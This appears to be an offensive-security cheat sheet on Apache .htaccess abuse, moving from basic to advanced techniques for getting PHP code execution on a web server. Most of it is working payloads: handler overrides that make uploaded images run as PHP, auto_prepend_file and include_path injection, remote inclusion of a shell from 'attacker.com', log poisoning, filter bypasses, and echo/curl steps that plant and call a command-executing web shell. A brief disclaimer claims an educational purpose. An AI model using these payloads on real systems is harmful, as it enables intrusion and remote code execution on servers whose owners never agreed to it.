.htaccess Attack Vectors & Security Bypasses
.htaccess Attack Vectors & Security Bypasses
This document consolidates attack techniques using the .htaccess file, from basic to advanced. It includes file upload exploitation, PHP configuration injection, and security filter bypass techniques.
Table of Contents
- Part 1: Basic - File Upload Exploitation
- Part 2: Intermediate - PHP Config Injection
- Part 3: Advanced - Bypass & Deep Exploitation Techniques
- Part 4: Real-world Attack Scenarios
- Notes & Disclaimer
Part 1: Basic - File Upload Exploitation
These techniques are commonly used when .htaccess files can be uploaded but .php file uploads are blocked.
1.1 Changing Handler to Execute Image Files as PHP
Allows files with extensions such as .jpg, .png, .txt to be processed as PHP.
Example (.htaccess):
AddType application/x-httpd-php .jpg .png .gif .txtExplanation:
AddType assigns a PHP MIME type to selected extensions.
Usage:
Upload shell.jpg containing PHP code; it will be executed.
Effect: Bypasses filters that only allow image uploads.
1.2 Basic SetHandler
Example:
<FilesMatch "shell\.(jpg|png|txt)$">
SetHandler application/x-httpd-php
</FilesMatch>Explanation:
FilesMatch applies rules to files matching the regex pattern.
1.3 ForceType
Example:
<Files "hack">
ForceType application/x-httpd-php
</Files>Explanation: Forces PHP execution regardless of file extension.
Part 2: Intermediate - PHP Config Injection
Modify PHP runtime configuration via .htaccess
(requires AllowOverride Options or equivalent).
2.1 PHP Value Injection
Technique 1: auto_prepend_file
Example:
php_value auto_prepend_file "/etc/passwd"
php_value auto_prepend_file "php://input"Explanation: Automatically includes a file before any PHP script executes.
Technique 2: include_path
Example:
php_value include_path "Z:/path/with/<?php system($_GET['cmd']); ?>"Explanation:
PHP may parse code embedded inside include_path.
2.2 Remote File Inclusion (RFI)
Example:
php_flag allow_url_fopen On
php_flag allow_url_include On
php_value auto_prepend_file "http://attacker.com/shell.txt"Advantage: No need to upload a shell to the target server.
2.3 Log Poisoning via .htaccess
Example:
php_value error_log "/var/www/html/shell.php"
php_value include_path "<?php system($_GET['cmd']); ?>"Attack Flow:
- Redirect
error_logto a writable or accessible file - Trigger errors containing attacker-controlled payload
- Include the poisoned log file to achieve RCE
Part 3: Advanced - Bypass & Deep Exploitation Techniques
3.1 Filter Bypass with Line Continuation
Example:
php_value auto_prepend_fi\
le "php://input"Explanation: Apache concatenates lines ending with backslash during parsing.
3.2 Chained Exploitation
Example:
php_flag allow_url_include On
php_value auto_append_file "data://text/plain;base64,PD9waHAgZWNobyAnU2hlbGwgQWN0aXZhdGVkJzsgPz4="
AddType application/x-httpd-php .phtml .phar .inc3.3 Apache Expression & Header Injection
Example:
<If "%{REQUEST_URI} =~ /test/">
Header set X-Powered-By "<?php system('id'); ?>"
</If>3.4 Mod_Rewrite Exploitation
Example:
RewriteEngine On
RewriteCond %{QUERY_STRING} ^cmd=(.*)$
RewriteRule ^.*$ - [E=CMD:%1]
<If "%{ENV:CMD} != ''">
php_value auto_prepend_file "data://text/plain,<?php system(getenv('CMD')); ?>"
</If>3.5 Nested .htaccess (Double Layer)
Example:
<Files ".hidden">
ForceType application/x-httpd-php
</Files>Part 4: Real-world Attack Scenarios
Scenario 1: Upload .htaccess + Shell
Steps:
echo 'AddType application/x-httpd-php .jpg' > .htaccess
echo '<?php system($_GET["cmd"]); ?>' > shell.jpg
curl 'http://target.com/uploads/shell.jpg?cmd=id'Scenario 2: Log Poisoning
Steps:
curl 'http://target.com/?page=non_existent'
curl 'http://target.com/poison.php?c=whoami'Notes & Disclaimer
Notes:
- Write access to
.htaccessis required - Target directory must allow overrides
- Often combined with file upload vulnerabilities
Disclaimer: This document is for security research and educational purposes only. Unauthorized use is illegal.